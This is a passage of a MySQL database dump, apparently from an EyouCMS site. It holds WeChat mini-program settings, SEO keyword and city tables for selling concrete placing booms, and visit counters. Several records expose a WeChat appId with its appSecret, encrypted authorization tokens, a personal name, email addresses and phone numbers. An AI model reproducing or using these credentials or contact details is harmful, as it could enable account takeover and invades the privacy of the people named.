o\\/img\\/tabbar\\/user.png\",\"selectedIconPath\":\"https:\\/\\/service.eyysz.cn\\/public\\/static\\/common\\/diyminipro\\/img\\/tabbar\\/user-active.png\",\"color\":\"\",\"selectedColor\":\"\",\"url\":\"\",\"pathconf\":{\"index\":\"user_index\",\"value\":\"\",\"is_vars\":0}}]},\"diyStyle\":{\"titleModel\":{\"style\":0,\"text\":{\"source\":\"default\",\"default\":{\"size\":15,\"color\":\"#000000\"},\"custom\":{\"size\":15,\"color\":\"#000000\"}},\"linesbackground\":\"#00aeff\"},\"commonModel\":{\"background\":\"#f4f4f4\",\"navtitleTextColor\":\"black\",\"navtitleBackgroundColor\":\"#ffffff\"}}}', '3', '0', '1', '1', '0', 'cn', '1604452245', '1604452245');
-- -----------------------------
-- Table structure for `ey_weapp_diyminipro_mall_setting`
-- -----------------------------
DROP TABLE IF EXISTS `ey_weapp_diyminipro_mall_setting`;
CREATE TABLE `ey_weapp_diyminipro_mall_setting` (
`id` int(10) NOT NULL AUTO_INCREMENT,
`name` varchar(60) NOT NULL DEFAULT '' COMMENT '页面组',
`value` text NOT NULL COMMENT '组装之后的值',
`mini_id` int(11) NOT NULL DEFAULT '0' COMMENT '小程序ID',
`lang` varchar(10) NOT NULL DEFAULT 'cn' COMMENT '语言标识',
`add_time` int(11) NOT NULL DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) NOT NULL DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`id`),
KEY `type` (`name`) USING BTREE,
KEY `mini_id` (`mini_id`,`lang`) USING BTREE
) ENGINE=MyISAM AUTO_INCREMENT=3 DEFAULT CHARSET=utf8 COMMENT='微信小程序多功能配置表';
-- -----------------------------
-- Records of `ey_weapp_diyminipro_mall_setting`
-- -----------------------------
INSERT INTO `ey_weapp_diyminipro_mall_setting` VALUES ('1', 'setting', '{\"tcp\":\"http\",\"domain\":\"www.scvip.net.cn\",\"root_dir\":\"\",\"name\":\"setting\",\"nid\":\"DiyminiproMall\",\"intro\":\"\\u9f99\\u51e4\\u4fe1\\u606f\\u7f51\",\"mini_id\":3,\"email\":\"15898383@qq.com\",\"appId\":\"wx168903912112b207\",\"navTitle\":\"\\u9f99\\u51e4\\u4fe1\\u606f\\u7f51\",\"username\":\"\\u7ba1\\u7406\\u5458\",\"mobile\":\"\",\"appSecret\":\"119c8c037962100f06e611c228181ae8\",\"originalId\":\"\",\"wechatId\":\"\",\"online_mini_id\":0,\"webviewdomain\":\"\",\"minipro\":\"DiyminiproMall\",\"status\":1,\"domain_api\":0,\"reason\":\"\",\"addTime\":1666683126,\"createminiproTime\":1666683261,\"auditid\":\"\",\"auditTime\":0,\"auditstatus\":3,\"miniproStatus\":3,\"estimateTime\":604800,\"version\":\"v4.20\",\"releaseTime\":0,\"template\":\"DiyminiproMall\",\"templateId\":223,\"component_info\":\"006dBANVAwIAAgkEUwZTCgUMUQFVBwNdBV4DCVROGltZXRVbXQBdRm9TSUQKVkMIEEJLVwRSAVtTDlIHXFRaAFBRARYfR1BdXUJWWgZcFW1TVlBREkdoTV1TBF5GDxoOBG9dcQZQYGJVWElMK2sEVFFZcQ1VeAd\\/aww4CCFqAFJUCQB3VVV5f31EDXEqalZza3ZBQSxAbwpxdRhGUm0LXHlkNlZ5AHJLRQMKQgp0AlhaTVRmCmxDdEZQG10idl9uTkZIYXgMUn9CdFt6VwsScUUDf3EYU1MUZHQPRxxbbGtPfAhZUDMBcQlfD0JVdFBLQUZxYjlcdn5zdil6RhkaWUNEDVtBDElXQm1YVwBXEkFtQVxfBFoVAxAOU281ZAxtWkhUB0cKellBYFxWFmMCX1hNan0SQAZYQk0qYA9mQVtHQCFBRhVaAwgHbQMPfwlxZ0J+UjJdZGt0ejtpLQFdZ2FDEXV7AGkffB9abQ5WFVgffEtcCnt5dHZbTHINf3RzegEcQQoHYlVkegh1JFcCVFpWS14IVlAUBWJXfQxDbWtzVwd6egF2BXZEQGU6YzdTc3B3eCV9FUQ\",\"authorizerInfo\":{\"nick_name\":\"\\u9b45\\u529b\\u9f99\\u51e4\",\"head_img\":\"http:\\/\\/wx.qlogo.cn\\/mmopen\\/zuIr8icwRPWFmpCgFsZVt9PeXPo6mMArnbQicgYmpDzAOHChgrlxibPCVseA2xcDQiceGVyXHcK9V0JLiaBibC2jiaZLW4icofdvtW9a\\/0\",\"service_type_info\":{\"id\":0},\"verify_type_info\":{\"id\":0},\"user_name\":\"gh_07bc9a3aac62\",\"alias\":\"\",\"qrcode_url\":\"http:\\/\\/mmbiz.qpic.cn\\/mmbiz_jpg\\/R0STiadkveico1hUksDhD88AR04Ol2DCaCSxetuO9XxX4pZflE5rGYNwP93MFLflM2hTrQUp9U9DGZd3eMSLc2NA\\/0\",\"business_info\":{\"open_pay\":0,\"open_shake\":0,\"open_scan\":0,\"open_card\":0,\"open_store\":0},\"idc\":1,\"principal_name\":\"\\u6c5f\\u6cb9\\u5e02\\u9f99\\u51e4\\u9547\\u4eba\\u6c11\\u653f\\u5e9c\",\"signature\":\"\\u9f99\\u51e4\\u4fe1\\u606f\\u53d1\\u5e03\\u5e73\\u53f0\\uff0c\\u4ea4\\u6d41\\u5e73\\u53f0\",\"MiniProgramInfo\":{\"network\":{\"RequestDomain\":[\"https:\\/\\/gm.scvip.net.cn\",\"https:\\/\\/service.eyysz.cn\",\"https:\\/\\/www.scvip.net.cn\"],\"WsRequestDomain\":[\"wss:\\/\\/gm.scvip.net.cn\",\"wss:\\/\\/service.eyysz.cn\",\"wss:\\/\\/www.scvip.net.cn\"],\"UploadDomain\":[\"https:\\/\\/gm.scvip.net.cn\",\"https:\\/\\/service.eyysz.cn\",\"https:\\/\\/www.scvip.net.cn\"],\"DownloadDomain\":[\"https:\\/\\/gm.scvip.net.cn\",\"https:\\/\\/service.eyysz.cn\",\"https:\\/\\/www.scvip.net.cn\"],\"BizDomain\":[\"https:\\/\\/gm.scvip.net.cn\",\"https:\\/\\/www.scvip.net.cn\"],\"UDPDomain\":[\"udp:\\/\\/gm.scvip.net.cn\"],\"TCPDomain\":[\"tcp:\\/\\/gm.scvip.net.cn\"],\"PrefetchDNSDomain\":[],\"NewRequestDomain\":[],\"NewWsRequestDomain\":[],\"NewUploadDomain\":[],\"NewDownloadDomain\":[],\"NewBizDomain\":[],\"NewUDPDomain\":[],\"NewTCPDomain\":[],\"NewPrefetchDNSDomain\":[]},\"categories\":[{\"first\":\"\\u653f\\u52a1\\u6c11\\u751f\",\"second\":\"\\u515a\\/\\u56e2\\/\\u7ec4\\u7ec7\"}],\"visit_status\":0},\"register_type\":0,\"account_status\":1,\"basic_config\":{\"is_phone_configured\":true,\"is_email_configured\":true}},\"authorizerStatus\":1}', '3', 'cn', '1666058922', '1666759067');
INSERT INTO `ey_weapp_diyminipro_mall_setting` VALUES ('2', 'set_arctype', 'a:9:{i:0;s:1:\"3\";i:1;s:2:\"50\";i:2;s:1:\"2\";i:3;s:1:\"4\";i:4;s:2:\"10\";i:5;s:2:\"14\";i:6;s:2:\"15\";i:7;s:2:\"29\";i:8;s:1:\"1\";}', '3', 'cn', '1666058988', '1666058996');
-- -----------------------------
-- Table structure for `ey_weapp_diyminipro_mall_users`
-- -----------------------------
DROP TABLE IF EXISTS `ey_weapp_diyminipro_mall_users`;
CREATE TABLE `ey_weapp_diyminipro_mall_users` (
`wxuser_id` int(11) NOT NULL AUTO_INCREMENT,
`users_id` int(11) NOT NULL DEFAULT '0' COMMENT '用户id',
`openid` varchar(100) NOT NULL DEFAULT '' COMMENT 'openid',
`nickname` varchar(100) NOT NULL DEFAULT '' COMMENT '微信昵称',
`headimgurl` varchar(200) NOT NULL DEFAULT '' COMMENT '头像',
`add_time` int(11) NOT NULL DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) NOT NULL DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`wxuser_id`),
KEY `openid` (`openid`) USING BTREE
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='微信小程序用户表';
-- -----------------------------
-- Table structure for `ey_weapp_keywords`
-- -----------------------------
DROP TABLE IF EXISTS `ey_weapp_keywords`;
CREATE TABLE `ey_weapp_keywords` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`keywords` varchar(100) DEFAULT '' COMMENT '关键词',
`keywordsseo` varchar(255) DEFAULT '' COMMENT '关键词SEO扩展',
`url` varchar(255) DEFAULT '' COMMENT '链接',
`djl` int(10) NOT NULL DEFAULT '0' COMMENT '访问次数',
`zt` int(1) NOT NULL DEFAULT '0' COMMENT '搜索页有无结果',
`ssrk` int(1) NOT NULL DEFAULT '0' COMMENT '是否是用户搜索入库',
`baidupushzt` int(1) NOT NULL DEFAULT '0' COMMENT '百度推送状态',
`shenmapushzt` int(1) NOT NULL DEFAULT '0' COMMENT '神马推送状态',
`sogoupushzt` int(1) NOT NULL DEFAULT '0' COMMENT '搜狗推送状态',
`toutiaopushzt` int(1) NOT NULL DEFAULT '0' COMMENT '头条推送状态',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=29 DEFAULT CHARSET=utf8;
-- -----------------------------
-- Records of `ey_weapp_keywords`
-- -----------------------------
INSERT INTO `ey_weapp_keywords` VALUES ('11', '布料机', '布料机,布料机打混凝土,布料机图片,布料机生产厂家混凝土布料机,布料机混凝土布料机,布料机多少钱一台,布料机型号及尺寸,布料机的使用与安装,布料机是干什么用的,布料机配件', '%E5%B8%83%E6%96%99%E6%9C%BA', '0', '0', '0', '0', '0', '0', '0', '1662432654', '1662432654');
INSERT INTO `ey_weapp_keywords` VALUES ('12', '液压布料机', '液压布料机,液压布料机多少钱一台,移动式液压布料机,内爬式液压布料机,移动液压布料机,液压布料机型号,液压布料机图片,液压布料机厂家,液压布料机安装调试视频,液压布料机租赁', '%E6%B6%B2%E5%8E%8B%E5%B8%83%E6%96%99%E6%9C%BA', '0', '0', '0', '0', '0', '0', '0', '1662432710', '1662432710');
INSERT INTO `ey_weapp_keywords` VALUES ('13', '混凝土布料机', '混凝土布料机,混凝土布料机价格,混凝土布料机图片,混凝土布料机型号有几种,混凝土布料机如何使用,混凝土布料机生产厂家,混凝土布料机重量,混凝土布料机方案,混凝土布料机公司,混凝土布料机盛基好', '%E6%B7%B7%E5%87%9D%E5%9C%9F%E5%B8%83%E6%96%99%E6%9C%BA', '0', '0', '0', '0', '0', '0', '0', '1662434049', '1662434049');
INSERT INTO `ey_weapp_keywords` VALUES ('14', '布料机厂家', '布料机厂家,混凝土布料机生产厂家,布料机型号及尺寸,淮安布料机厂家,布料机配件,布料机型号,布料机厂家直销,布料机报价,布料机厂家直销 布料机生产厂家', '%E5%B8%83%E6%96%99%E6%9C%BA%E5%8E%82%E5%AE%B6', '0', '0', '0', '0', '0', '0', '0', '1662434067', '1662434493');
INSERT INTO `ey_weapp_keywords` VALUES ('17', '布料机价格', '混凝土布料机价格,布料机多少钱一台,新型布料机图片,兰州混凝土布料机价格,定西混凝土布料机价格,布料机价格和图片,布料机价格厂家,布料机价格,新型布料机价格', '%E5%B8%83%E6%96%99%E6%9C%BA%E4%BB%B7%E6%A0%BC', '0', '0', '0', '0', '0', '0', '0', '1662442182', '1662442213');
INSERT INTO `ey_weapp_keywords` VALUES ('15', '混凝土布料机价格', '混凝土布料机价格,混凝土布料机图片,小型混凝土布料机,兰州混凝土布料机价格,定西混凝土布料机价格,电动混凝土布料机价格,布料机混凝土布料机,混凝土布料机如何使用,最先进混凝土布料机,混凝土布料机型号有几种', '%E6%B7%B7%E5%87%9D%E5%9C%9F%E5%B8%83%E6%96%99%E6%9C%BA%E4%BB%B7%E6%A0%BC', '0', '0', '0', '0', '0', '0', '0', '1662434086', '1662434086');
INSERT INTO `ey_weapp_keywords` VALUES ('16', '液压布料机型号', '液压布料机图片,混凝土液压布料机,液压布料机厂家,液压布料机租赁,液压布料机产品资料,移动式液压布料机,二手液压布料机,液压布料机多少钱一台,液压式混凝土布料机,新型液压布料机', '%E6%B6%B2%E5%8E%8B%E5%B8%83%E6%96%99%E6%9C%BA%E5%9E%8B%E5%8F%B7', '0', '0', '0', '0', '0', '0', '0', '1662434119', '1662434532');
INSERT INTO `ey_weapp_keywords` VALUES ('18', '电梯井液压布料机', '电梯井布料机安装视频,电梯井布料机图片,电梯井布料机价格,电梯井布料机厂家,电梯井爬升式布料机,电梯井内爬式布料机安装', '%E7%94%B5%E6%A2%AF%E4%BA%95%E6%B6%B2%E5%8E%8B%E5%B8%83%E6%96%99%E6%9C%BA', '0', '0', '0', '0', '0', '0', '0', '1662442536', '1662442632');
INSERT INTO `ey_weapp_keywords` VALUES ('19', '楼面内爬液压布料机', '楼面内爬式布料机,楼面内爬式布料机安装视频,楼面内爬式布料机图片,楼面内爬式布料机价格,楼面内爬式布料机厂家,楼面内爬式布料机,楼面内爬式布料机安装', '%E6%A5%BC%E9%9D%A2%E5%86%85%E7%88%AC%E6%B6%B2%E5%8E%8B%E5%B8%83%E6%96%99%E6%9C%BA', '0', '0', '0', '0', '0', '0', '0', '1662442554', '1662442708');
INSERT INTO `ey_weapp_keywords` VALUES ('20', '移动液压布料机', '移动液压布料机价格,移动式液压布料机,液压布料机图片,混凝土液压布料机,液压布料机厂家,液压布料机租赁,液压布料机产品资料,二手液压布料机,液压布料机型号,液压布料机多少钱一台', '%E7%A7%BB%E5%8A%A8%E6%B6%B2%E5%8E%8B%E5%B8%83%E6%96%99%E6%9C%BA', '0', '0', '0', '0', '0', '0', '0', '1662442731', '1662442731');
INSERT INTO `ey_weapp_keywords` VALUES ('21', '车轮式布料机', '车轮式布料机,车轮式布料机价格,车轮式布料机厂家,行走式布料机,车轮式布料机图片,车轮式布料机安装,车轮式混凝土布料机,车轮式布料机操作方法,车轮式布料机说明书', '%E8%BD%A6%E8%BD%AE%E5%BC%8F%E5%B8%83%E6%96%99%E6%9C%BA', '0', '0', '0', '0', '0', '0', '0', '1662442748', '1662442866');
INSERT INTO `ey_weapp_keywords` VALUES ('22', '内爬液压布料机', '内爬液压布料机需不需要缆风绳,内爬式混凝土液压布料机,液压布料机图片,混凝土液压布料机,液压布料机厂家,液压布料机租赁,液压布料机产品资料,移动式液压布料机,二手液压布料机,液压布料机多少钱一台', '%E5%86%85%E7%88%AC%E6%B6%B2%E5%8E%8B%E5%B8%83%E6%96%99%E6%9C%BA', '0', '0', '0', '0', '0', '0', '0', '1662442906', '1662442906');
INSERT INTO `ey_weapp_keywords` VALUES ('24', '船用布料机', '混凝土船用布料机,船用混凝土布料机价格,布料机图片,船用布料机安装,液压布料机,贵阳布料机,船用用什么布料,布料机打混凝土,布料机安装视频,布料机多少钱一台', '%E8%88%B9%E7%94%A8%E5%B8%83%E6%96%99%E6%9C%BA', '0', '0', '0', '0', '0', '0', '0', '1662443027', '1662443083');
INSERT INTO `ey_weapp_keywords` VALUES ('25', '模架液压布料机', '模架液压布料机图片,模架混凝土液压布料机,液压布料机厂家,液压布料机租赁,液压布料机产品资料,移动式液压布料机,二手液压布料机,液压布料机型号,液压布料机多少钱一台,液压式混凝土布料机', '%E6%A8%A1%E6%9E%B6%E6%B6%B2%E5%8E%8B%E5%B8%83%E6%96%99%E6%9C%BA', '0', '0', '0', '0', '0', '0', '0', '1662443246', '1662443285');
INSERT INTO `ey_weapp_keywords` VALUES ('26', '塔式混凝土布料机', '塔式混凝土布料机价格,布料机混凝土布料机,混凝土布料机图片,混凝土布料机如何使用,塔式布料机图片,塔式布料机价格,中联塔式布料机,塔式皮带布料机,塔式布料机安装视频,塔式布料机22米图片', '%E5%A1%94%E5%BC%8F%E6%B7%B7%E5%87%9D%E5%9C%9F%E5%B8%83%E6%96%99%E6%9C%BA', '0', '0', '0', '0', '0', '0', '0', '1662443304', '1662443304');
INSERT INTO `ey_weapp_keywords` VALUES ('28', '专用制梁布料机', '路桥专用制梁布料机,专用制梁布料机价格,专用制梁布料机厂家,制梁布料机图片,制梁布料机报价', '%E8%B7%AF%E6%A1%A5%E4%B8%93%E7%94%A8%E5%88%B6%E6%A2%81%E5%B8%83%E6%96%99%E6%9C%BA', '1', '0', '0', '0', '0', '0', '0', '1662443345', '1662443495');
-- -----------------------------
-- Table structure for `ey_weapp_linkkeyword`
-- -----------------------------
DROP TABLE IF EXISTS `ey_weapp_linkkeyword`;
CREATE TABLE `ey_weapp_linkkeyword` (
`id` int(10) NOT NULL AUTO_INCREMENT,
`title` varchar(50) NOT NULL DEFAULT '' COMMENT '关键词',
`url` varchar(200) NOT NULL DEFAULT '' COMMENT '链接地址',
`target` tinyint(1) NOT NULL DEFAULT '0' COMMENT '新窗口',
`sort_order` int(10) NOT NULL DEFAULT '0' COMMENT '排序号',
`status` tinyint(1) NOT NULL DEFAULT '1' COMMENT '状态(1=启用,0=禁用)',
`add_time` int(11) NOT NULL DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) NOT NULL DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`id`) USING BTREE
) ENGINE=MyISAM DEFAULT CHARSET=utf8 ROW_FORMAT=DYNAMIC;
-- -----------------------------
-- Table structure for `ey_weapp_messages`
-- -----------------------------
DROP TABLE IF EXISTS `ey_weapp_messages`;
CREATE TABLE `ey_weapp_messages` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`title` varchar(50) DEFAULT '' COMMENT '通知标题',
`users_id` text COMMENT '通知用户账号',
`remark` text COMMENT '通知信息',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
-- -----------------------------
-- Table structure for `ey_weapp_messages_read`
-- -----------------------------
DROP TABLE IF EXISTS `ey_weapp_messages_read`;
CREATE TABLE `ey_weapp_messages_read` (
`messages_id` int(11) NOT NULL AUTO_INCREMENT,
`users_id` varchar(50) DEFAULT NULL COMMENT '用户账号',
`id` int(10) DEFAULT NULL COMMENT '站内信id',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`messages_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
-- -----------------------------
-- Table structure for `ey_weapp_minicount`
-- -----------------------------
DROP TABLE IF EXISTS `ey_weapp_minicount`;
CREATE TABLE `ey_weapp_minicount` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`day` int(10) DEFAULT '0' COMMENT '今天流量',
`total` int(10) DEFAULT '0' COMMENT '总流量',
`dayline` int(10) DEFAULT '0',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`id`),
KEY `users_id` (`dayline`)
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8;
-- -----------------------------
-- Records of `ey_weapp_minicount`
-- -----------------------------
INSERT INTO `ey_weapp_minicount` VALUES ('1', '3', '3', '1', '1524975826', '1600738692');
-- -----------------------------
-- Table structure for `ey_weapp_minicount_log`
-- -----------------------------
DROP TABLE IF EXISTS `ey_weapp_minicount_log`;
CREATE TABLE `ey_weapp_minicount_log` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`ip` varchar(20) DEFAULT '',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`id`),
KEY `ip` (`ip`) USING BTREE
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8;
-- -----------------------------
-- Records of `ey_weapp_minicount_log`
-- -----------------------------
INSERT INTO `ey_weapp_minicount_log` VALUES ('1', '127.0.0.1', '1600738682', '1600738692');
-- -----------------------------
-- Table structure for `ey_weapp_minipro0002`
-- -----------------------------
DROP TABLE IF EXISTS `ey_weapp_minipro0002`;
CREATE TABLE `ey_weapp_minipro0002` (
`id` int(10) NOT NULL AUTO_INCREMENT,
`type` varchar(100) DEFAULT '' COMMENT '页面组',
`value` text COMMENT '组装之后的值',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`id`),
KEY `type` (`type`)
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8 COMMENT='插件小程序0002表';
-- -----------------------------
-- Records of `ey_weapp_minipro0002`
-- -----------------------------
INSERT INTO `ey_weapp_minipro0002` VALUES ('1', 'minipro', '{\"username\":\"\\u8303\\u4e2d\\u6797\",\"email\":\"jymjzx@126.com\",\"mobile\":\"13990166543\",\"appId\":\"wx168903912112b207\",\"appSecret\":\"119c8c037962100f06e611c228181ae8\",\"originalId\":\"gh_07bc9a3aac62\",\"wechatId\":\"\",\"tcp\":\"https\",\"domain\":\"gm.scvip.net.cn\",\"mini_id\":0,\"online_mini_id\":0,\"root_dir\":\"\",\"webviewdomain\":\"gm.scvip.net.cn\",\"intro\":\"\\u9f99\\u51e4\\u4fe1\\u606f\\u7f51\",\"navTitle\":\"\\u9f99\\u51e4\\u4fe1\\u606f\\u7f51\",\"minipro\":\"Minipro0002\",\"status\":1,\"domain_api\":0,\"reason\":\"\",\"addTime\":1665983178,\"createminiproTime\":0,\"auditid\":\"\",\"auditTime\":0,\"auditstatus\":3,\"miniproStatus\":2,\"estimateTime\":604800,\"version\":\"\",\"releaseTime\":0,\"template\":\"Minipro0002\",\"templateId\":144,\"component_info\":\"5006BVIGVlVVUwAAVlUNUAtXBAJVBldQDFMBVFIeFFJXX0haDFMIEToCQEAPBxYIGhFKBVRUUlRUUldWCARUCV5TXBdOFAUKCBNfXgMNQG1ZBVEDQkE7QloPAQ8SXxQHCW1KVjZXPFwMIHgAP1RfClUtHzFuBjJFWzcQBUAOBUgKQ0B8OGkvPCI6AWkKLGxoDCcACnNhUGNUMgIsXyRCfgBYYgEGURYHAzdjRgFQa2ZnHF0DQmFUeWYvBilID1l5YXF9eSQBP1UAMHdDMlNgYF0RY1NUZFd5QAkONURXXFZ7elZlLWJVVAsAUn1REEBrejJ0NXZVJXd0My45EkkUUE1GUFoQXxwAFzxRUwUGR0FnEl0NVFxGDBdSVT50UWVnU1x6d1tlJyg6PFhIKS4ZURUtazF3cwUCVFJcVG8LAG4OXFcMKnUDVTQ3WnoIAWBKUTRxCkh0F2JYLgAnXgpHWGkfb18beARdElpvQlYkf0ABIwsLBlQgdFBUNFRYUn1iTB9LBhtiPBdTFgFqFSdfC3sHBxwCf11bACcwEQBIA3BUdEINBnISLQRXA1o+L3pbeSF2N3R1Rks\",\"authorizerInfo\":{\"nick_name\":\"\\u9b45\\u529b\\u9f99\\u51e4\",\"head_img\":\"http:\\/\\/wx.qlogo.cn\\/mmopen\\/zuIr8icwRPWFmpCgFsZVt9PeXPo6mMArnbQicgYmpDzAOHChgrlxibPCVseA2xcDQiceGVyXHcK9V0JLiaBibC2jiaZLW4icofdvtW9a\\/0\",\"service_type_info\":{\"id\":0},\"verify_type_info\":{\"id\":0},\"user_name\":\"gh_07bc9a3aac62\",\"alias\":\"\",\"qrcode_url\":\"http:\\/\\/mmbiz.qpic.cn\\/mmbiz_jpg\\/R0STiadkveico1hUksDhD88AR04Ol2DCaCSxetuO9XxX4pZflE5rGYNwP93MFLflM2hTrQUp9U9DGZd3eMSLc2NA\\/0\",\"business_info\":{\"open_pay\":0,\"open_shake\":0,\"open_scan\":0,\"open_card\":0,\"open_store\":0},\"idc\":1,\"principal_name\":\"\\u6c5f\\u6cb9\\u5e02\\u9f99\\u51e4\\u9547\\u4eba\\u6c11\\u653f\\u5e9c\",\"signature\":\"\\u9f99\\u51e4\\u4fe1\\u606f\\u53d1\\u5e03\\u5e73\\u53f0\\uff0c\\u4ea4\\u6d41\\u5e73\\u53f0\",\"MiniProgramInfo\":{\"network\":{\"RequestDomain\":[\"https:\\/\\/gm.scvip.net.cn\"],\"WsRequestDomain\":[\"wss:\\/\\/gm.scvip.net.cn\"],\"UploadDomain\":[\"https:\\/\\/gm.scvip.net.cn\"],\"DownloadDomain\":[\"https:\\/\\/gm.scvip.net.cn\"],\"BizDomain\":[],\"UDPDomain\":[\"udp:\\/\\/gm.scvip.net.cn\"],\"TCPDomain\":[\"tcp:\\/\\/gm.scvip.net.cn\"],\"PrefetchDNSDomain\":[],\"NewRequestDomain\":[],\"NewWsRequestDomain\":[],\"NewUploadDomain\":[],\"NewDownloadDomain\":[],\"NewBizDomain\":[],\"NewUDPDomain\":[],\"NewTCPDomain\":[],\"NewPrefetchDNSDomain\":[]},\"categories\":[{\"first\":\"\\u653f\\u52a1\\u6c11\\u751f\",\"second\":\"\\u515a\\/\\u56e2\\/\\u7ec4\\u7ec7\"}],\"visit_status\":0},\"register_type\":0,\"account_status\":1,\"basic_config\":{\"is_phone_configured\":true,\"is_email_configured\":true}},\"authorizerStatus\":1}', '1665983176', '1665983746');
-- -----------------------------
-- Table structure for `ey_weapp_multicity`
-- -----------------------------
DROP TABLE IF EXISTS `ey_weapp_multicity`;
CREATE TABLE `ey_weapp_multicity` (
`id` int(11) NOT NULL AUTO_INCREMENT COMMENT '表id',
`topid` int(10) DEFAULT '0' COMMENT '顶级ID',
`parent_id` int(10) DEFAULT '0' COMMENT '父id',
`name` varchar(32) DEFAULT '' COMMENT '地区名称',
`level` tinyint(4) DEFAULT '0' COMMENT '地区等级 分省市县区',
`status` tinyint(1) unsigned NOT NULL DEFAULT '1' COMMENT '状态(1:开启,0:隐藏)',
`is_hot` tinyint(1) unsigned NOT NULL DEFAULT '0' COMMENT '是否热门',
`domain` varchar(50) NOT NULL DEFAULT '' COMMENT '城市目录',
`seo_title` varchar(200) DEFAULT '' COMMENT 'SEO标题',
`seo_keywords` varchar(200) DEFAULT '' COMMENT 'SEO关键词',
`seo_description` text COMMENT 'SEO描述',
`sort_order` int(6) unsigned NOT NULL DEFAULT '100' COMMENT '排序',
`add_time` int(11) NOT NULL DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) NOT NULL DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=404 DEFAULT CHARSET=utf8;
-- -----------------------------
-- Records of `ey_weapp_multicity`
-- -----------------------------
INSERT INTO `ey_weapp_multicity` VALUES ('31', '21', '21', '无锡市', '2', '1', '0', 'wuxi', '无锡市混凝土布料机厂家', '无锡市混凝土布料机价格,无锡混凝土布料机,无锡混凝土布料机厂家', '无锡市混凝土布料机专业生产厂家联系电话:17858811257', '100', '1652178546', '1655083631');
INSERT INTO `ey_weapp_multicity` VALUES ('30', '22', '22', '中山区', '3', '1', '0', 'zhongshan', '中山区', '中山区布料机价格,中山区液压布料机,中山区液压布料机厂家', '中山区布料机专业生产厂家联系电话:17858811257', '100', '1652178529', '1655083040');
INSERT INTO `ey_weapp_multicity` VALUES ('29', '22', '22', '玄武湖区', '3', '1', '0', 'xuanwuhuqu', '玄武湖区液压布料机厂家', '玄武湖区布料机价格,玄武湖区液压布料机,玄武湖区液压布料机厂家', '玄武湖区布料机专业生产厂家联系电话:17858811257', '100', '1652178510', '1655082644');
INSERT INTO `ey_weapp_multicity` VALUES ('28', '27', '27', '上海市', '2', '1', '0', 'shs', '上海液压布料机厂家', '上海布料机价格,上海液压布料机,上海液压布料机厂家', '上海布料机专业生产厂家联系电话:17858811257', '100', '1652178474', '1655099437');
INSERT INTO `ey_weapp_multicity` VALUES ('21', '0', '0', '江苏省', '1', '1', '0', 'jss', '江苏省液压布料机厂家', '江苏省布料机价格,江苏省液压布料机,江苏省液压布料机厂家', '江苏省布料机专业生产厂家联系电话:17858811257', '5', '1651929303', '1655099305');
INSERT INTO `ey_weapp_multicity` VALUES ('22', '21', '21', '南京市', '2', '1', '0', 'nanjingshi', '南京液压布料机厂家', '南京布料机价格,南京液压布料机,南京液压布料机厂家', '南京布料机专业生产厂家联系电话:17858811257', '100', '1651929318', '1655082152');
INSERT INTO `ey_weapp_multicity` VALUES ('23', '22', '22', '雨花台区', '3', '1', '0', 'yuhuataiqu', '雨花台液压布料机厂家', '雨花台布料机价格,雨花台液压布料机,雨花台液压布料机厂家', '雨花台布料机专业生产厂家联系电话:17858811257', '100', '1651929328', '1655082310');
INSERT INTO `ey_weapp_multicity` VALUES ('27', '0', '0', '上海市', '1', '1', '0', 'shanghai', '上海', '上海', '上海', '100', '1652008705', '1655080594');
INSERT INTO `ey_weapp_multicity` VALUES ('32', '0', '0', '安徽省', '1', '1', '0', 'ahs', '安徽省混凝土布料机厂家', '安徽省混凝土布料机价格,安徽省混凝土布料机,安徽省混凝土布料机厂家', '安徽省混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655078313', '1655099813');
INSERT INTO `ey_weapp_multicity` VALUES ('33', '32', '32', '合肥市', '2', '1', '0', 'hfs', '合肥市混凝土布料机厂家', '合肥市混凝土布料机价格,合肥市混凝土布料机,合肥市混凝土布料机厂家', '合肥市混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655078483', '1655099967');
INSERT INTO `ey_weapp_multicity` VALUES ('34', '21', '21', '徐州市', '2', '1', '0', 'xuzhoushi', '徐州液压布料机厂家', '徐州布料机价格,徐州液压布料机,徐州液压布料机厂家', '徐州布料机专业生产厂家联系电话:17858811257', '100', '1655078597', '1655083882');
INSERT INTO `ey_weapp_multicity` VALUES ('35', '21', '21', '常州市', '2', '1', '0', 'changzhoushi', '常州市混凝土布料机厂家', '常州混凝土布料机价格,常州混凝土布料机,常州混凝土布料机厂家', '常州混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655078620', '1655085638');
